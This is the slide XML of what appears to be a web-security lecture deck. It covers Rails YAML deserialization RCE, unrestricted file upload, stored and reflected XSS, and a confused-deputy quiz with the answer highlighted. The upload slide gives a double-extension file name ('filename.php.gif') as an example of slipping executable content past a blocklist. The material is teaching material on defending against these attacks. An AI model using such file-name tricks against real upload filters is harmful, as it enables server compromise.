              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/article/the-myspace-worm-that-changed-the-internet-forever/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3456244385"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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77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77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779">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779">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779">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779">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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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 grpId="0" uiExpand="1" build="p" bldLvl="5" advAuto="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Input validation, ad infinitum"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="502412">
              <a:defRPr sz="9632"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11200" dirty="0"/>
              <a:t>Related: Deserialization</a:t>
            </a:r>
            <a:endParaRPr sz="11200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Many other web-based bugs that are ultimately due to trusting external input (too much)…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Many other web-based bugs that are ultimately due to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>trusting external input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (too much)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Another example: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Ruby on Rails Remote Code Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Web request parameters parsed by content type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>YAML data can be embedded in XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Standard Ruby YAML parser can create Ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>YAML parsing can trigger those objects — oops!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Fix</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: filter out or reject YAML, or its code constructs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="887" name="http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-vulnerability-explained/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816546" y="11227565"/>
            <a:ext cx="12750908" cy="1260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3700" u="sng">
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-vulnerability-explained/</a:t>
            </a:r>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8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8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886">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="10" presetClass="entr" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="887"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="100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 grpId="0" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="887"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92839-822A-2D88-9D95-423E59EF5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ED53E-B10C-732F-78BE-BBAE6E9F33D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137424" y="625078"/>
            <a:ext cx="22079415" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Related: Unrestricted file upload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005DFA93-E467-7FB2-9265-0942D256D27C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like stored XSS: A site permits uploading a file but is not careful about the type of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Files with executable content might be confused as code, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blocklisting care required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filename.php.gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– might allow by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but then server interprets according to </a:t>
            </a:r>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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(!!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worry: case sensitivity, Unicode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Idea: Generate fresh filename into which to store uploaded content with safe type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4519FB-0DAD-37AE-C6F3-889D35CD46A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4281011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dissolv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dissolv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F437D-774A-4642-B217-3A97D7551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A3D20-B433-DD4A-DDD5-C728CE8D0B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370114" y="625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F19EED-9E99-8986-5C7F-70AB04927EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771783" y="4497572"/>
            <a:ext cx="20840433" cy="5622156"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Cross-site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Server-side Request Forgery (SSRF)</a:t>
            </a:r>
          </a:p>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dirty="0"/>
              <a:t>Both A and B</a:t>
            </a:r>
          </a:p>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dirty="0"/>
              <a:t>All three: A, B, and C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90244B0-E205-249E-8735-5A84E6148D80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85ABF65-4B1F-7794-3C21-3E1E76FA9A3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606050" y="2342301"/>
            <a:ext cx="21648554" cy="1498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800" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>What attacks leverage confused deputies?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3346362583"/>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DE63A-14FD-9D4B-808C-903E8245E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5E746-D078-4D69-A438-813ADA4EB850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370114" y="625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CD2D48-41F0-864F-EFCD-0BC222B7C8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771783" y="4497572"/>
            <a:ext cx="20840433" cy="5622156"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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dirty="0"/>
              <a:t>Cross-site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>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dirty="0"/>
              <a:t>Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>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dirty="0"/>
              <a:t>Server-side Request Forgery (SSRF)</a:t>
            </a:r>
          </a:p>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dirty="0"/>
              <a:t>Both A and B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="0" indent="-914400" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All three: A, B, and C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA7345E-BEA4-8C28-FB04-04415B183E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68B3D05-4F3E-1B53-25CC-4DF5AA1CF075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606050" y="2342301"/>
            <a:ext cx="21648554" cy="1498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800" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>What attacks leverage confused deputies?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178487857"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Two types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Shape 783"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="864305" indent="-864305" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4900">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Stored (or “persistent”) XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Attacker leaves their script on the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The server later unwittingly sends it to your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Your browser, none the wiser, executes it within the same origin as the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864305" indent="-864305" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="4900">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Attacker gets you to send the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> server a URL that includes some </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0"/>
              <a:t>echoes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
